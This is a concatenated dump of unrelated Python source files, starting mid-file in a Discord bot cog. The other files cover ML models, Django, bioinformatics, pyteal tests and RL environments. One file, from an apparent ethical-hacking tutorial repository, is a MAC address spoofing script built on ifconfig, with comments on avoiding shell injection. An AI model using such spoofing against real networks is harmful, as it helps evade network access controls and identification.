**{len(list(self.bot.users))}**\nTotal Channels: **{text}**", ) em.add_field( name="Developers:", inline=False, value="<@633967275090771971> (Shinyzenith#6969 **Project Manager and Owner**)\n<@488688724948025357> (DankCoder#9983 **Project Manager, Front-end Developer, and Owner**)\n<@403657714812715008> (LinusDropTips#0404 **Developer**)\n<@747265562501185596> (thurm#1337 **Developer**)\n<@633764848924229635> (Ckyiu#9659 **Developer**)", ) em.add_field( name="Server info:", value=f"Discord.py Version: **{discord.__version__}**\nPython verion: **{sys.version}**\nVerion info: **{sys.version_info}**\n\nCPU: **{cpupercent}% used with {plural(psutil.cpu_count()):CPU} \n{cpubar}**\n\nMemory: **{humanize.naturalsize(mem.used)}/{humanize.naturalsize(mem.total)} \n{membar} ({mem.percent}% used)**\n\nDisk Space: **{humanize.naturalsize(disk.used)}/{humanize.naturalsize(disk.total)}\n{diskbar} ({disk.percent}% used)**", ) em.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url) em.set_thumbnail(url=ctx.message.author.avatar_url) em.set_footer(text=f"Requested by {ctx.author}") await ctx.send(embed=em) @commands.command(name="uptime", 
description="Check my uptime") async def uptime(self, ctx): delta = datetime.datetime.utcnow() - self.bot.startup_time await ctx.send(f"I started up {humanize.precisedelta(delta)} ago") @commands.command(name="invite", description="Get a invite link to add me to your server") async def invite(self, ctx): perms = discord.Permissions.all() em = discord.Embed(color=discord.Color.blurple()) em.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url) em.set_thumbnail(url=ctx.message.author.avatar_url) em.add_field( name="Invite Me!", inline=False, value=f"[Click Here](<{discord.utils.oauth_url(self.bot.user.id, permissions=perms)}>)", ) em.set_footer(text=f"{ctx.author}", icon_url=ctx.message.author.avatar_url) await ctx.send(embed=em) def setup(bot): bot.add_cog(Config(bot)) test_files/LEDtest.py import RPi.GPIO as GPIO import time GPIO.setmode(GPIO.BOARD) GPIO.setup(7,GPIO.OUT) for x in range(0,3): GPIO.output(7,True) time.sleep(1) GPIO.output(7,False) time.sleep(1) GPIO.cleanup() # -*- coding: utf-8 -*- from __future__ import unicode_literals, print_function, division from django.conf import settings from django.db import models from django.utils.translation import ugettext_lazy as _ from aldryn_forms.models import BaseFormPlugin def get_default_client_id(): return getattr(settings, 'DJANGOCMS_SALESFORCE_FORMS_CLIENT_ID', '') def get_default_external_key(): return getattr(settings, 'DJANGOCMS_SALESFORCE_FORMS_EXTERNAL_KEY', '') class SalesforceFormPlugin(BaseFormPlugin): client_id = models.CharField( verbose_name=_('Client ID'), max_length=255, help_text=_( 'Client ID to use for the submission ' '(_clientID field)' ), default=get_default_client_id, ) external_key = models.CharField( verbose_name=_('External Key'), max_length=255, help_text=_( 'DEManager External Key to use for the submission ' '(_deExternalKey field)' ), default=get_default_external_key, ) class Meta: abstract = False users/serializers.py0 from .models import CustomUser class UserSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = CustomUser fields = ['url', 'username', 'email', 'is_staff']import torch from pdb import set_trace as st import copy class PredAvgEnsemble(torch.nn.Module): def __init__(self, clients): super(PredAvgEnsemble, self).__init__() self.models = [copy.deepcopy(client.model_trainer.model) for client in clients] # self.models = [(client.model_trainer.model) for client in clients] # print(self.models[0].linear.weight.data_ptr() == self.models[1].linear.weight.data_ptr()) def update_clients(self, branches, clients): for model, w in zip(self.models, branches): model.load_state_dict(w) # for param1, param2 in zip(self.models[4].parameters(), self.models[8].parameters()): # print((param1==param2).all()) # st() # st() def forward(self, x): preds = [m(x) for m in self.models] preds = torch.stack(preds) preds = torch.mean(preds, axis=0) return preds def to(self, device): for model in self.models: model.to(device) def eval(self): for model in self.models: model.eval() toyota_na/vehicle/entity_types/ToyotaLockableOpening.py from .ToyotaOpening import ToyotaOpening class ToyotaLockableOpening(ToyotaOpening): _locked: bool def __init__(self, closed: bool = False, locked: bool = False): ToyotaOpening.__init__(self, closed) self._locked = locked @property def locked(self): return self._locked @locked.setter def locked(self, value): self._locked = value def __repr__(self) -> str: return ( f"{self.__class__.__name__}(closed={self._closed}, locked={self._locked})" ) import argparse import 
warnings from pytorch_lightning.models.trainer import Trainer from pytorch_lightning.callbacks import ModelCheckpoint from test_tube import Experiment import models warnings.filterwarnings('ignore') def main(): parser = argparse.ArgumentParser() parser.add_argument('--model', choices=['srcnn', 'srgan'], required=True) parser.add_argument('--scale_factor', type=int, default=4) parser.add_argument('--batch_size', type=int, default=16) parser.add_argument('--patch_size', type=int, default=96) parser.add_argument('--gpus', type=str, default='0') opt = parser.parse_args() # load model class if opt.model == 'srcnn': Model = models.SRCNNModel elif opt.model == 'srgan': Model = models.SRGANModel # add model specific arguments to original parser parser = Model.add_model_specific_args(parser) opt = parser.parse_args() # instantiate experiment exp = Experiment(save_dir=f'./logs/{opt.model}') exp.argparse(opt) model = Model(opt) # define callbacks checkpoint_callback = ModelCheckpoint( filepath=exp.get_media_path(exp.name, exp.version), ) # instantiate trainer trainer = Trainer( experiment=exp, max_nb_epochs=4000, add_log_row_interval=50, check_val_every_n_epoch=10, checkpoint_callback=checkpoint_callback, gpus=[int(i) for i in opt.gpus.split(',')] ) # start training! trainer.fit(model) if __name__ == "__main__": main() 0 text = 'GCACTTCTCGTAGGTGACCATTCGCACTTCTGCACTTCTAACAGCGCCAACAGCGCCCGTAGGTGGCACTTCTCGTAGGTGACCATTCACCATTCCGTAGGTGAACAGCGCCAACAGCGCCCGTAGGTGCGTAGGTGACCATTCACCATTCAACAGCGCCATAGCATCAACAGCGCCGCACTTCTACCATTCCGTAGGTGCGTAGGTGCGTAGGTGATAGCATCACCATTCCGTAGGTGATAGCATCCGTAGGTGAACAGCGCCACCATTCATAGCATCATAGCATCGCACTTCTCGTAGGTGGCACTTCTATAGCATCCGTAGGTGATAGCATCAACAGCGCCATAGCATCGCACTTCTCGTAGGTGGCACTTCTCGTAGGTGATAGCATCAACAGCGCCATAGCATCCGTAGGTGCGTAGGTGACCATTCAACAGCGCCACCATTCAACAGCGCCATAGCATCATAGCATCAACAGCGCCAACAGCGCCATAGCATCATAGCATCACCATTCATAGCATCGCACTTCTATAGCATCATAGCATCAACAGCGCCCGTAGGTGACCATTCATAGCATCGCACTTCTCGTAGGTGACCATTCCGTAGGTGCGTAGGTGGCACTTCTATAGCATCCGTAGGTGACCATTCACCATTCATAGCATCGCACTTCTACCATTCAACAGCGCCACCATTCATAGCATCCGTAGGTGATAGCATCATAGCATCCGTAGGTGCGTAGGTGCGTAGGTGCGTAGGTGCGTAGGTGCGTAGGTGAACAGCGCCATAGCATCGCACTTCTAACAGCGCCATAGCATCATAGCATC' k = 11 symbol_to_number = dict() symbol_to_number['A'] = 0 symbol_to_number['C'] = 1 symbol_to_number['G'] = 2 symbol_to_number['T'] = 3 number_to_symbol = ['A', 'C', 'G', 'T'] #index = 5871 #pattern = [] def number_to_pattern(index, k, pattern=None): if pattern is None: pattern = [] if k == 1: symbol = number_to_symbol[index] pattern.append(symbol) else: prefix_index = int(index) // 4 r = int(index) % 4 symbol = number_to_symbol[r] pattern.append(symbol) prefix_pattern = number_to_pattern(prefix_index, k - 1, pattern) patt = ''.join(pattern) patt = ''.join(reversed(patt)) #pattern.reverse() return patt def pattern_to_number(pattern): if len(pattern) == 0: return 0 symbol = pattern[-1] prefix = pattern[:-1] return 4 * pattern_to_number(prefix) + symbol_to_number[symbol] def computing_frequencies(text, k): frequency_array = [] for i in range(4**k): frequency_array.append(0) for i in range(len(text) - k + 1): pattern = text[i : i+k] j = pattern_to_number(pattern) frequency_array[j] = frequency_array[j] + 1 return frequency_array def faster_frequent_words(text, k): frequent_patterns = set() frequency_array = computing_frequencies(text, k) max_count = max(frequency_array) #print(max_count) for i in range(4**k): if frequency_array[i] == max_count: print(i) patterns = number_to_pattern(i, k) print(patterns) frequent_patterns.add(patterns) return frequent_patterns 
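# Illustrative sanity check of the k-mer <-> index mapping above (a minimal sketch
# with hand-chosen values): pattern_to_number and number_to_pattern are inverses,
# treating A=0, C=1, G=2, T=3 as base-4 digits.
assert pattern_to_number('AGT') == 11          # 0*16 + 2*4 + 3
assert number_to_pattern(11, 3) == 'AGT'
assert computing_frequencies('ACGT', 1) == [1, 1, 1, 1]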
print(faster_frequent_words(text, k)) src/main.py from neochi.core.dataflow.data import clap_detector from neochi.core.dataflow.notifications import clap_detector as CD import sys import alsaaudio, time, audioop import threading import clapdetector as cld import redis def push_to_redis(redis_handler): clap_detected = CD.DetectedClap(redis_handler) clap_detected.notify() clap_detector = cld.ClapDetector("default:CARD=Device") r = redis.StrictRedis('redis', 6379, db=0) clap_detector.set_on_detect_func(push_to_redis, r) clap_detector.detect() import inspect import sys from functools import wraps from typing import Any, List, Optional, Union class hybridmethod: def __init__(self, func): self.func = func def __get__(self, obj, cls): @wraps(self.func) def hybrid(*args, **kwargs): return self.func(cls, obj, *args, **kwargs) hybrid.__func__ = hybrid.im_func = self.func hybrid.__self__ = hybrid.im_self = obj or cls return hybrid def _get_type_cons(type_): if sys.version_info.minor == 6: try: cons = type_.__extra__ except AttributeError: try: cons = type_.__origin__ except AttributeError: cons = type_ else: cons = type_ if cons is None else cons else: try: cons = type_.__origin__ if cons is None else cons except AttributeError: cons = type_ else: cons = type_.__origin__ return cons def _get_type_origin(type_): try: origin = type_.__origin__ except AttributeError: if sys.version_info.minor == 6: try: origin = type_.__extra__ except AttributeError: origin = type_ else: origin = type_ if origin is None else origin else: origin = type_ return origin def _hasargs(type_, *args): try: return all(arg in type_.__args__ for arg in args) except AttributeError: return False def _isinstance_safe(o, t): try: return isinstance(o, t) except Exception: return False def _issubclass_safe(cls, classinfo): try: return issubclass(cls, classinfo) except Exception: return _is_new_type(cls) and _is_new_type_subclass_safe(cls, classinfo) def _is_new_type_subclass_safe(cls, classinfo): super_type = getattr(cls, "__supertype__", None) if super_type: return _is_new_type_subclass_safe(super_type, classinfo) try: return issubclass(cls, classinfo) except Exception: return False def _is_new_type(type_): return inspect.isfunction(type_) and hasattr(type_, "__supertype__") def _is_optional(type_): return (_issubclass_safe(type_, Optional) or _hasargs(type_, type(None)) or type_ is Any) def _is_list(type_): return _issubclass_safe(type_, List) or _get_type_origin(type_) is list def _is_union(type_): return _get_type_origin(type_) is Union #!/usr/bin/env python # -*- coding: utf-8 -*- import argparse import logging from dipy.io.stateful_tractogram import Space, StatefulTractogram from dipy.io.streamline import save_tractogram import numpy as np from scilpy.tracking.tools import filter_streamlines_by_length from scilpy.io.streamlines import load_tractogram_with_reference from scilpy.io.utils import (assert_inputs_exist, assert_outputs_exist, add_overwrite_arg, add_reference_arg, add_verbose_arg) def _build_args_parser(): p = argparse.ArgumentParser( formatter_class=argparse.RawTextHelpFormatter, description='Filter streamlines by length.') p.add_argument('in_tractogram', help='Streamlines input file name.') p.add_argument('out_tractogram', help='Streamlines output file name.') p.add_argument('--minL', default=0., type=float, help='Minimum length of streamlines. [%(default)s]') p.add_argument('--maxL', default=np.inf, type=float, help='Maximum length of streamlines. 
[%(default)s]') p.add_argument('--no_empty', action='store_true', help='Do not write file if there is no streamline.') add_reference_arg(p) add_overwrite_arg(p) add_verbose_arg(p) return p def main(): parser = _build_args_parser() args = parser.parse_args() assert_inputs_exist(parser, args.in_tractogram) assert_outputs_exist(parser, args, args.out_tractogram) if args.verbose: logging.basicConfig(level=logging.DEBUG) sft = load_tractogram_with_reference(parser, args, args.in_tractogram) new_streamlines, new_per_point, new_per_streamline = filter_streamlines_by_length( sft, args.minL, args.maxL) new_sft = StatefulTractogram(new_streamlines, sft, Space.RASMM, data_per_streamline=new_per_streamline, data_per_point=new_per_point) if not new_streamlines: if args.no_empty: logging.debug("The file {} won't be written " "(0 streamline).".format(args.out_tractogram)) return logging.debug('The file {} contains 0 streamline'.format( args.out_tractogram)) save_tractogram(new_sft, args.out_tractogram) if __name__ == "__main__": main() scripts/sam_translate.py #!/usr/bin/env python # Based on https://github.com/awslabs/serverless-application-model/blob/master/bin/sam-translate.py import argparse import json import os import boto3 from samtranslator.public.translator import ManagedPolicyLoader from samtranslator.translator.transform import transform from samtranslator.yaml_helper import yaml_parse def parse_arguments(): parser = argparse.ArgumentParser() parser.add_argument('-i', '--input-file', help='Location of SAM tamplate to transform') parser.add_argument('-o', '--output-file', help='Location of resulting Cloudformation template (in JSON format)') args = parser.parse_args() cwd = os.getcwd() input_file_path = os.path.join(cwd, args.input_file) output_file_path = os.path.join(cwd, args.output_file) return input_file_path, output_file_path def main(): input_file_path, output_file_path = parse_arguments() with open(input_file_path) as f: sam_template = yaml_parse(f) iam = boto3.client('iam') cloudformation_template = transform(sam_template, {}, ManagedPolicyLoader(iam)) with open(output_file_path, 'w') as f: f.write(json.dumps(cloudformation_template, indent=2)) print(f'Wrote transformed Cloudformation template to {output_file_path}') if __name__ == '__main__': main() # basic tuple functionality x = (1, 2, 3 * 4) print(x) try: x[0] = 4 print("FAIL") raise SystemExit except TypeError: pass print(x) try: x.append(5) print("FAIL") raise SystemExit except AttributeError: pass print(x[1:]) print(x[:-1]) print(x[2:3]) print(x + (10, 100, 10000)) # inplace add operator x += (10, 11, 12) print(x) # construction of tuple from large iterator (tests implementation detail of uPy) print(tuple(range(20))) # unsupported unary operation try: +() print("FAIL") raise SystemExit except TypeError: pass # unsupported type on RHS of add try: () + None print("FAIL") raise SystemExit except TypeError: pass print("PASS")# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. 
from typing import TYPE_CHECKING from cdm.enums import CdmObjectType from cdm.enums.cdm_operation_type import OperationTypeConvertor, CdmOperationType from cdm.persistence.cdmfolder.types import OperationArrayExpansion from cdm.utilities.logging import logger from cdm.utilities.string_utils import StringUtils if TYPE_CHECKING: from cdm.objectmodel import CdmCorpusContext, CdmOperationArrayExpansion from cdm.utilities import ResolveOptions, CopyOptions _TAG = 'OperationArrayExpansionPersistence' class OperationArrayExpansionPersistence: """Operation ArrayExpansion persistence""" @staticmethod def from_data(ctx: 'CdmCorpusContext', data: 'OperationArrayExpansion') -> 'CdmOperationArrayExpansion': if not data: return None array_expansion_op = ctx.corpus.make_object(CdmObjectType.OPERATION_ARRAY_EXPANSION_DEF) if data.type and not StringUtils.equals_with_ignore_case(data.type, OperationTypeConvertor._operation_type_to_string(CdmOperationType.ARRAY_EXPANSION)): logger.error(_TAG, ctx, '$type {} is invalid for this operation.'.format(data.type)) else: array_expansion_op.type = CdmOperationType.ARRAY_EXPANSION if data.explanation: array_expansion_op.explanation = data.explanation array_expansion_op.start_ordinal = data.startOrdinal array_expansion_op.end_ordinal = data.endOrdinal return array_expansion_op @staticmethod def to_data(instance: 'CdmOperationArrayExpansion', res_opt: 'ResolveOptions', options: 'CopyOptions') -> 'OperationArrayExpansion': if not instance: return None obj = OperationArrayExpansion() obj.type = OperationTypeConvertor._operation_type_to_string(CdmOperationType.ARRAY_EXPANSION) obj.explanation = instance.explanation obj.startOrdinal = instance.start_ordinal obj.endOrdinal = instance.end_ordinal return obj workflow/scripts/distance_json_to_table.py1-10 """ Convert a distances JSON into a single table of values. """ import argparse import json import pandas as pd if __name__ == '__main__': parser = argparse.ArgumentParser( description="Convert distances JSON to a data frame", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("--json", required=True, help="distances JSON") parser.add_argument("--output", required=True, help="tab-delimited file with frequency per node at the last available timepoint") parser.add_argument("--distance-attribute", required=True, help="name of the distance attribute to export") args = parser.parse_args() # Load distances. with open(args.json, "r") as fh: distances_json = json.load(fh) distances = distances_json["nodes"] # Create one record for each pairwise distance. records = [] for sample, sample_distances in distances.items(): for other_sample, distance in sample_distances[args.distance_attribute].items(): records.append({ "sample": sample, "other_sample": other_sample, "distance": distance }) # Convert records into a data frame. df = pd.DataFrame(records) # Save the table. 
df.to_csv(args.output, sep="\t", index=False, header=True) yelp_package/dockerfiles/itest/httpdrain/httpdrain.py import datetime import errno import os from wsgiref.simple_server import make_server from pyramid.config import Configurator from pyramid.response import Response DRAIN_FILE = "drain" def drain(request): if not os.path.exists(DRAIN_FILE): with open(DRAIN_FILE, "w+") as f: f.write(str(datetime.datetime.now().timestamp())) return Response(status_int=200) def stop_drain(request): try: os.remove(DRAIN_FILE) return Response(status_int=200) except OSError as e: if e.errno != errno.ENOENT: raise else: return Response(status_int=200) def status_drain(request): if os.path.exists(DRAIN_FILE): return Response(status_int=200) else: return Response(status_int=400) def safe_to_kill(request): if os.path.exists(DRAIN_FILE): with open(DRAIN_FILE) as f: dt = datetime.datetime.fromtimestamp(float(f.read())) delta = datetime.datetime.now() - dt if delta.seconds > 2: return Response(status_int=200) else: return Response(status_int=400) else: return Response(status_int=400) if __name__ == "__main__": with Configurator() as config: config.add_route("drain", "/drain") config.add_route("stop_drain", "/drain/stop") config.add_route("drain_status", "/drain/status") config.add_route("drain_safe_to_kill", "/drain/safe_to_kill") config.add_view(drain, route_name="drain") config.add_view(stop_drain, route_name="stop_drain") config.add_view(status_drain, route_name="drain_status") config.add_view(safe_to_kill, route_name="drain_safe_to_kill") app = config.make_wsgi_app() server = make_server("0.0.0.0", 3000, app) server.serve_forever() jackyhuynh/ethical-hacking-using-python0 #!/usr/bin/env python import subprocess import optparse import re """ This is a security testing of the ifconfig """ # def mac_changer_str(interface, new_mac): # subprocess.call(f"ifconfig {interface} down", shell=True) # disable the MAC address # subprocess.call(f"ifconfig {interface} hw ether {new_mac}", shell=True) # subprocess.call(f"ifconfig {interface} up", shell=True) # enable the mac Address """ This is a more secure version of the above function That can help user prevent code injection More detail on list """ def mac_changer(interface, new_mac): print("[+] Changing MAC Address for " + interface + " to " + new_mac) subprocess.call(["ifconfig", interface, "down"]) # disable the MAC address subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) subprocess.call(["ifconfig", interface, "up"]) # enable the mac Address """ get user input """ def get_arguments(): parser = optparse.OptionParser() # -i, --interface: to specify the interface/ dest: where store the user input, help="Interface to change its MAC address" parser.add_option("-i", "--interface", dest="interface", help="Interface to change its MAC address") parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address") # methods return 2 set of information (options, arguments) = parser.parse_args() if not options.interface: parser.error("[-] Please specify an interface, use --help for more info") elif not options.new_mac: parser.error("[-] Please specify a new mac, use --help for more info") return options def get_current_mac(interface): ifconfig_result = subprocess.check_output(["ifconfig", interface]) mac_address_search_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", str(ifconfig_result)) if mac_address_search_result: return mac_address_search_result.group(0) else: print("[-]Clould not read MAC address") # get the user input options = get_arguments() 
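# Why the list form used in mac_changer() above resists injection (illustrative
# note): with subprocess.call(["ifconfig", interface, "down"]), a value such as
# "eth0; reboot" reaches ifconfig as one literal argument, whereas the
# commented-out shell=True string version would hand the whole command line to a
# shell, which would interpret the ";" and run the extra command.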
current_mac = get_current_mac(options.interface) print("Current MAC = " + str(current_mac)) # interface of the options user input mac_changer(options.interface, options.new_mac) current_mac = get_current_mac(options.interface) if current_mac == options.new_mac: print("[+] MAC was sucessfully change to " + current_mac) else: print("[-] MAC address did not get changed.") import math import torch.nn as nn from ove.utils.models import Sequential from .GeneralModels import BasicBlock class MultipleBasicBlock(nn.Module): def __init__(self): super().__init__() self.block1 = Sequential( nn.Conv2d(437, 128, kernel_size=(7, 7), stride=(1, 1), padding=3, bias=True), nn.ReLU(inplace=True) ) self.block2 = BasicBlock(128, 128, dilation=1, init_modules=True) self.block3 = BasicBlock(128, 128, dilation=1, init_modules=True) self.block4 = BasicBlock(128, 128, dilation=1, init_modules=True) self.block5 = Sequential(nn.Conv2d(128, 3, (3, 3), (1, 1), (1, 1))) for m in self.modules(): if isinstance(m, nn.Conv2d): n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(0, math.sqrt(2. / n)) elif isinstance(m, nn.BatchNorm2d): m.weight.data.fill_(1) m.bias.data.zero_() def forward(self, x): x = self.block1(x) x = self.block2(x) x = self.block3(x) x = self.block4(x) x = self.block5(x) return x import pytest import pyteal as pt options = pt.CompileOptions() def test_bytes_base32_no_padding(): for s in ( "ME", "MFRA", "MFRGG", "MFRGGZA", "MFRGGZDF", "7Z5PWO2C6LFNQFGHWKSK5H47IQP5OJW2M3HA2QPXTY3WTNP5NU2MHBW27M", ): expr = pt.Bytes("base32", s) assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock( [pt.TealOp(expr, pt.Op.byte, "base32(" + s + ")")] ) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base32_padding(): for s in ( "ME======", "MFRA====", "MFRGG===", "MFRGGZA=", "7Z5PWO2C6LFNQFGHWKSK5H47IQP5OJW2M3HA2QPXTY3WTNP5NU2MHBW27M======", ): expr = pt.Bytes("base32", s) assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock( [pt.TealOp(expr, pt.Op.byte, "base32(" + s + ")")] ) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base32_empty(): expr = pt.Bytes("base32", "") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "base32()")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base64(): expr = pt.Bytes("base64", "Zm9vYmE=") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "base64(Zm9vYmE=)")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base64_empty(): expr = pt.Bytes("base64", "") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "base64()")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base16(): expr = pt.Bytes("base16", "A21212EF") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0xA21212EF")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base16_prefix(): expr = pt.Bytes("base16", "0xA21212EF") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0xA21212EF")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base16_empty(): expr = pt.Bytes("base16", "") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0x")]) actual, _ = 
expr.__teal__(options) assert actual == expected def test_bytes_utf8(): expr = pt.Bytes("hello world") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, '"hello world"')]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_utf8_special_chars(): expr = pt.Bytes("\t \n \r\n \\ \" ' 😀") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock( [ pt.TealOp( expr, pt.Op.byte, '"\\t \\n \\r\\n \\\\ \\" \' \\xf0\\x9f\\x98\\x80"' ) ] ) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_utf8_empty(): expr = pt.Bytes("") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, '""')]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_raw(): for value in (b"hello world", bytearray(b"hello world")): expr = pt.Bytes(value) assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0x" + value.hex())]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_raw_empty(): for value in (b"", bytearray(b"")): expr = pt.Bytes(value) assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0x")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_invalid(): with pytest.raises(pt.TealInputError): pt.Bytes("base16", b"FF") with pytest.raises(pt.TealInputError): pt.Bytes(b"base16", "FF") with pytest.raises(pt.TealInputError): pt.Bytes("base23", "") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "Zm9vYmE=") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "MFRGG====") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "MFRGG==") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "CCCCCC==") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "CCCCCC") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "C=======") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "C") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "=") with pytest.raises(pt.TealInputError): pt.Bytes("base64", "?????") with pytest.raises(pt.TealInputError): pt.Bytes("base16", "7Z5PWO2C6LFNQFGHWKSK5H47IQP5OJW2M3HA2QPXTY3WTNP5NU2MHBW27M") lvisdd/gctshogi-zero import argparse import os import sys import re import statistics import matplotlib.pyplot as plt parser = argparse.ArgumentParser() parser.add_argument('dir', type=str) args = parser.parse_args() def find_all_files(directory): for root, dirs, files in os.walk(directory): for file in files: yield os.path.join(root, file) ptn_rate = re.compile(r"^'(black|white)_rate:.*:(.*)$") kifu_count = 0 rates = [] for filepath in find_all_files(args.dir): rate = {} move_len = 0 toryo = False try: for line in open(filepath, 'r', encoding='utf-8'): line = line.strip() m = ptn_rate.match(line) if m: rate[m.group(1)] = float(m.group(2)) if line[:1] == '+' or line[:1] == '-': move_len += 1 if line == '%TORYO': toryo = True if not toryo or move_len <= 50 or len(rate) < 2 or min(rate.values()) < 3000: os.remove(filepath) else: kifu_count += 1 rates.extend([_ for _ in rate.values()]) except: print("skip -> " + filepath) os.remove(filepath) print('kifu count :', kifu_count) print('rate mean : {}'.format(statistics.mean(rates))) print('rate median : {}'.format(statistics.median(rates))) print('rate max : {}'.format(max(rates))) print('rate min : {}'.format(min(rates))) plt.hist(rates) plt.show()rl/utils/vec_env/subproc_vec_env.py from 
multiprocessing import Process, Pipe import numpy as np from rl.utils.vec_env import VecEnv, CloudpickleWrapper from gym import spaces def _worker(remote, parent_remote, env_fn_wrapper): parent_remote.close() env = env_fn_wrapper.var() while True: try: cmd, data = remote.recv() if cmd == 'step': observation, reward, done, info = env.step(data) ''' if done: observation = env.reset() ''' remote.send((observation, reward, done, info)) elif cmd == 'reset': observation = env.reset() remote.send(observation) elif cmd == 'render': remote.send(env.render(*data[0], **data[1])) elif cmd == 'close': remote.close() break elif cmd == 'seed': env.seed(data) remote.send(True) elif cmd == 'get_spaces': remote.send((env.observation_space, env.action_space)) elif cmd == 'env_method': method = getattr(env, data[0]) remote.send(method(*data[1], **data[2])) elif cmd == 'get_attr': remote.send(getattr(env, data)) elif cmd == 'set_attr': remote.send(setattr(env, data[0], data[1])) else: raise NotImplementedError except EOFError: break class SubprocVecEnv(VecEnv): """ Creates a multiprocess vectorized wrapper for multiple environments :param env_fns: ([Gym Environment]) Environments to run in subprocesses """ def __init__(self, env_fns): self.waiting = False self.closed = False n_envs = len(env_fns) self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(n_envs)]) self.processes = [ Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))) for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns) ] for process in self.processes: process.daemon = True # if the main process crashes, we should not cause things to hang process.start() for remote in self.work_remotes: remote.close() self.remotes[0].send(('get_spaces', None)) observation_space, action_space = self.remotes[0].recv() self.goal_env = False self.goal_keys = None dummy_env = env_fns[0]() self.dummy_env = dummy_env if hasattr(dummy_env, '_max_episode_steps'): self._max_episode_steps = dummy_env._max_episode_steps if isinstance(observation_space, spaces.Dict): if dummy_env.compute_reward is not None: self.compute_reward = dummy_env.compute_reward if hasattr(dummy_env, 'goal_extraction_function') and dummy_env.goal_extraction_function is not None: self.goal_extraction_function = dummy_env.goal_extraction_function self.goal_env = True self.goal_keys = tuple(observation_space.spaces.keys()) VecEnv.__init__(self, len(env_fns), observation_space, action_space) def step_async(self, actions): for remote, action in zip(self.remotes, actions): remote.send(('step', action)) self.waiting = True def step_wait(self): results = [remote.recv() for remote in self.remotes] self.waiting = False obs, rews, dones, infos = zip(*results) if self.goal_env: obs = {k: np.stack([o[k] for o in obs]) for k in self.goal_keys} else: obs = np.stack(obs) return obs, np.stack(rews), np.stack(dones), infos def reset(self): for remote in self.remotes: remote.send(('reset', None)) obs = [remote.recv() for remote in self.remotes] if self.goal_env: obs = {k: np.stack([o[k] for o in obs]) for k in self.goal_keys} else: obs = np.stack(obs) return obs def seed(self, seeds=None): if seeds is None: seeds = [None for _ in range(self.num_envs)] if isinstance(seeds, int): seeds = [seeds + i for i in range(self.num_envs)] assert len(seeds) == self.num_envs for remote, seed in zip(self.remotes, seeds): remote.send(('seed', seed)) _ = [remote.recv() for remote in self.remotes] def close(self): if self.closed: return if self.waiting: for remote in 
self.remotes: remote.recv() for remote in self.remotes: remote.send(('close', None)) for process in self.processes: process.join() self.closed = True def render(self, mode='human', *args, **kwargs): for pipe in self.remotes: # gather images from subprocesses # `mode` will be taken into account later pipe.send(('render', (args, {'mode': 'rgb_array', **kwargs}))) imgs = [pipe.recv() for pipe in self.remotes] # Create a big image by tiling images from subprocesses bigimg = tile_images(imgs) if mode == 'human': import cv2 cv2.imshow('vecenv', bigimg[:, :, ::-1]) cv2.waitKey(1) elif mode == 'rgb_array': return bigimg else: raise NotImplementedError def get_images(self): for pipe in self.remotes: pipe.send(('render', {"mode": 'rgb_array'})) imgs = [pipe.recv() for pipe in self.remotes] return imgs def get_attr(self, attr_name, indices=None): """Return attribute from vectorized environment (see base class).""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('get_attr', attr_name)) return [remote.recv() for remote in target_remotes] def set_attr(self, attr_name, value, indices=None): """Set attribute inside vectorized environments (see base class).""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('set_attr', (attr_name, value))) for remote in target_remotes: remote.recv() def 